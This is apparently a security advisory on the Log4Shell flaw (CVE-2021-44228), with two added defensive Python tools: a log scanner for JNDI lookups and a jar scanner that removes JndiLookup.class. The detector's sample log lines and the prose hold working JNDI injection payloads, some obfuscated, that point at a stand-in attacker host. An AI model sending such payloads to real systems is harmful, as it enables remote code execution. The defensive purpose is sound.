Critical Apache Log4j Vulnerability is currently Exploited Across the World (CVE-2021-44228)

A remote code execution (RCE) vulnerability in Apache Log4j 2 was observed being exploited in the wild on 9 December 2021. Proof-of-concept (PoC) exploits for this critical zero-day in the ubiquitous Apache Log4j Java logging library are now circulating online, exposing home users and enterprises alike to remote code execution attacks. Log4j is developed by the Apache Software Foundation and is used widely by both enterprise applications and cloud services.

While home users may have largely moved away from Java (although popular games such as Minecraft still use it), any enterprise software or web application that bundles the library, including products from Apple, Amazon, Cloudflare, Twitter, and Steam, is likely vulnerable to RCE exploits targeting this flaw.

Current Exploitation and Scanning for Vulnerable Systems

The flaw, now tracked as CVE-2021-44228 and also known as Log4Shell or LogJam, is an unauthenticated RCE vulnerability allowing complete system takeover on systems running Log4j 2.0-beta9 through 2.14.1.

It was reported to Apache on 24 November by a cloud provider's security team (Alibaba Cloud Security Team). The reporters also disclosed that CVE-2021-44228 affects the default configuration of multiple Apache frameworks, including Apache Struts2, Apache Solr, Apache Druid, Apache Flink, and others.

Once an initial proof-of-concept exploit was posted on GitHub, attackers started scanning the Internet for systems vulnerable to this remotely exploitable bug, which requires no authentication.

CERT NZ (New Zealand's national Computer Emergency Response Team) has also issued a security advisory warning of active exploitation in the wild. The Apache Software Foundation states that in Apache Log4j 2 versions 2.14.1 and earlier, "JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints." In practice this means any attacker-controlled string that reaches a log call, such as an HTTP User-Agent header or a query parameter, can carry a lookup of the form ${jndi:ldap://attacker-host/x}; Log4j resolves the lookup at logging time and the JNDI client fetches, and can execute, code from the attacker's server.
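The lookup mechanism described above is also what defenders hunt for in their logs. The following Python detector is an added example, not code from the original article or from the Log4j project: it normalizes the evasions commonly seen in scanning traffic (URL encoding, nested ${lower:}/${upper:} lookups, and ${key:-default} tricks such as ${::-j}) before searching for ${jndi:, and it runs over constructed sample access-log lines (the host attacker.example and the IP addresses are made up for the example).

```python
import re
from typing import List, Tuple
from urllib.parse import unquote

# Constructed sample web-server access-log lines (not real captures). The
# attacker-controlled fields are the User-Agent and the query string, both of
# which a Java backend commonly passes to Log4j.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://attacker.example/a}"',
    '10.0.0.8 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${lower:j}ndi:${lower:l}dap://attacker.example/b}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example:1099/c}"',
    '10.0.0.10 - - [10/Dec/2021:12:00:05 +0000] '
    '"GET /?x=%24%7Bjndi%3Adns%3A%2F%2Fattacker.example%2Fd%7D HTTP/1.1" 200 12 "-" "curl/7.79"',
]

# Log4j resolves nested lookups before it examines the outer prefix, so
# ${lower:j}ndi and ${::-j}ndi both become "jndi" by the time JNDI is consulted.
_LOWER = re.compile(r"\$\{lower:([^${}]*)\}", re.IGNORECASE)
_UPPER = re.compile(r"\$\{upper:([^${}]*)\}", re.IGNORECASE)
# ${key:-default} yields the default when the key resolves to nothing; we assume
# the attacker chose keys that resolve to nothing (the usual ${::-x} form).
_DEFAULT = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# Log4j lowercases the lookup prefix, so ${JNDI:...} is just as dangerous.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:[^}]*\}", re.IGNORECASE)


def normalize(text: str) -> str:
    """Undo URL encoding and the nested-lookup evasions until nothing changes."""
    prev = None
    while prev != text:
        prev = text
        text = unquote(text)  # %24%7B... -> ${...
        text = _LOWER.sub(lambda m: m.group(1).lower(), text)
        text = _UPPER.sub(lambda m: m.group(1).upper(), text)
        text = _DEFAULT.sub(lambda m: m.group(1), text)
    return text


def find_jndi_lookups(line: str) -> List[Tuple[str, str]]:
    """Return (scheme, normalized lookup) for each ${jndi:...} in one line."""
    norm = normalize(line)
    return [(m.group(1).lower(), m.group(0)) for m in _JNDI.finditer(norm)]


def scan(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Scan many lines; each hit is (line index, scheme, normalized lookup)."""
    hits = []
    for idx, line in enumerate(lines):
        for scheme, lookup in find_jndi_lookups(line):
            hits.append((idx, scheme, lookup))
    return hits


if __name__ == "__main__":
    for idx, scheme, lookup in scan(SAMPLE_LOG_LINES):
        print(f"line {idx}: jndi via {scheme}: {lookup}")
```

Matching on the raw text for the literal string `${jndi:` misses three of the four malicious lines above; normalizing first is what makes the rule hold up. The scheme is reported separately because ldap and rmi lookups indicate an attempt at remote class loading, while dns lookups are usually only a callback used to confirm that a target is vulnerable.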

How Broad Is the Attack Surface?

The library is ubiquitous in enterprise Java software. "Given how ubiquitous this library is, the impact of this vulnerability is quite severe."


"So many services are vulnerable to this exploit. Cloud services like Steam and Apple iCloud, and applications like Minecraft, have already been found to be vulnerable. Anyone who uses Apache Struts is likely vulnerable. We have seen similar vulnerabilities exploited before in breaches like the 2017 Equifax data breach."

But it does not stop there: there are probably printers and CCTV systems running with the default, vulnerable configuration. A GitHub project is trying to map out the probable attack surface by listing likely affected manufacturers and components (including Apache frameworks such as Apache Solr).

It is going to be a long weekend for security teams across the world as they try to pinpoint which applications used by their organizations include the vulnerable library (and whether it can be exploited), so we can expect a more precise list to be compiled by the broader security community over the next few days.

What Patches and Mitigations Are Available?

Apache has released Log4j 2.15.0 to address the maximum-severity CVE-2021-44228 RCE vulnerability. In earlier releases (2.10 and later) the bug can be mitigated by setting the system property log4j2.formatMsgNoLookups to true (or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true), or by removing the JndiLookup class from the classpath. Removing the class is the more robust of the two because it takes the vulnerable code out entirely and also works on versions older than 2.10, where the property is not honored. Note that Apache later found the initial fix incomplete and shipped further 2.x releases, so upgrade to the latest 2.x release rather than to 2.15.0 specifically.
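To act on the mitigation above you first have to find every copy of log4j-core on a host, including copies buried inside fat jars. The following Python scanner is an added example, not code from the original article or from the Log4j project: it walks a directory tree, reports every archive that contains JndiLookup.class together with the version read from the jar's own Maven pom.properties, recurses into nested jars, and removes the class from a top-level jar (the same effect as `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`). The jars it scans in run_demo() are constructed fixtures containing only the entries the scanner reads, not real Log4j builds.

```python
import io
import os
import re
import tempfile
import zipfile
from typing import Dict, List, Optional

# The class that implements ${jndi:...}; its presence is what makes a
# log4j-core jar exploitable, so it is what we look for and what we remove.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
# Maven metadata shipped inside log4j-core; gives the version without unpacking classes.
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVES = (".jar", ".war", ".ear")


def is_vulnerable_version(version: Optional[str]) -> bool:
    """True for the CVE-2021-44228 range 2.0-beta9 .. 2.14.1. An unknown or
    unparseable version with JndiLookup present is treated as vulnerable."""
    if version is None:
        return True
    m = re.match(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-(beta|rc)(\d+))?$", version)
    if not m:
        return True
    major, minor, patch = int(m[1]), int(m[2]), int(m[3] or 0)
    if major != 2:
        return False  # Log4j 1.x is a separate code base; this CVE does not apply to it
    if m[4]:          # 2.0 pre-releases: beta9 and later, and every rc, are affected
        return m[4] == "rc" or int(m[5]) >= 9
    return (minor, patch) <= (14, 1)


def _inspect(zf: zipfile.ZipFile, label: str) -> List[Dict]:
    """Report JndiLookup in this archive and in jars nested inside it
    (fat jars such as Spring Boot's BOOT-INF/lib/*.jar are a common blind spot)."""
    names = zf.namelist()
    findings = []
    if JNDI_CLASS in names:
        version = None
        if POM_PROPS in names:
            for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        findings.append({"path": label, "version": version,
                         "vulnerable": is_vulnerable_version(version)})
    for name in names:
        if name.lower().endswith(ARCHIVES):
            try:
                with zipfile.ZipFile(io.BytesIO(zf.read(name))) as inner:
                    findings.extend(_inspect(inner, f"{label}!/{name}"))
            except zipfile.BadZipFile:
                pass
    return findings


def scan_tree(root: str) -> List[Dict]:
    """Walk a directory and inspect every jar/war/ear found."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            if f.lower().endswith(ARCHIVES):
                path = os.path.join(dirpath, f)
                try:
                    with zipfile.ZipFile(path) as zf:
                        findings.extend(_inspect(zf, path))
                except zipfile.BadZipFile:
                    pass
    return findings


def remove_jndi_lookup(jar_path: str) -> bool:
    """Rewrite a top-level log4j-core jar without JndiLookup.class. Jars nested
    inside a fat jar must have the outer archive repacked instead."""
    tmp = jar_path + ".tmp"
    removed = False
    with zipfile.ZipFile(jar_path) as src, zipfile.ZipFile(tmp, "w") as dst:
        for item in src.infolist():
            if item.filename == JNDI_CLASS:
                removed = True
                continue
            dst.writestr(item, src.read(item.filename))  # keeps compression and timestamps
    os.replace(tmp, jar_path)
    return removed


def _fixture_jar(target, version: Optional[str], with_jndi: bool) -> None:
    """Constructed stand-in for a log4j-core jar: only the entries the scanner reads."""
    with zipfile.ZipFile(target, "w") as zf:
        if with_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only
        if version:
            zf.writestr(POM_PROPS, f"version={version}\nartifactId=log4j-core\n")


def run_demo() -> Dict:
    """Scan a constructed tree, strip JndiLookup from the top-level jar, rescan."""
    with tempfile.TemporaryDirectory() as root:
        lib = os.path.join(root, "lib")
        os.makedirs(lib)
        vuln = os.path.join(lib, "log4j-core-2.14.1.jar")
        _fixture_jar(vuln, "2.14.1", with_jndi=True)
        _fixture_jar(os.path.join(lib, "other.jar"), None, with_jndi=False)
        nested = io.BytesIO()  # an older log4j-core embedded in a fat application jar
        _fixture_jar(nested, "2.13.0", with_jndi=True)
        with zipfile.ZipFile(os.path.join(root, "app.jar"), "w") as fat:
            fat.writestr("BOOT-INF/lib/log4j-core-2.13.0.jar", nested.getvalue())
        rel = lambda p: p[len(root) + 1:]  # report paths relative to the tree root
        before = scan_tree(root)
        removed = remove_jndi_lookup(vuln)
        after = scan_tree(root)
        return {
            "before": sorted(rel(f["path"]) for f in before),
            "versions_before": sorted(str(f["version"]) for f in before),
            "all_vulnerable_before": all(f["vulnerable"] for f in before),
            "removed": removed,
            "after": sorted(rel(f["path"]) for f in after),
        }
```

The demo deliberately leaves the copy inside app.jar in the "after" list: a fat jar has to be rebuilt or patched by its vendor, which is exactly the downstream-update problem raised later in this article. Treat a jar whose version cannot be read as vulnerable, and re-run the scan after any deployment, since build pipelines tend to reintroduce the old dependency.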

Those using the library are advised to update to the latest version as soon as possible, since threat actors are already searching for exploitable targets. "Similar to other high-profile vulnerabilities such as Heartbleed and Shellshock, Xiarch believes that there will be an escalating number of vulnerable products found in the weeks to come."

"Due to the ease of exploitation and the breadth of applicability, we expect ransomware attackers to start leveraging this vulnerability immediately."

"The log4j package may be bundled in with software you use provided by any given vendor. In this case, unfortunately, the vendors themselves will need to push the security updates downstream. As you assess your own risk and threat model, please consider the components of the software you use and especially what may be publicly accessible."
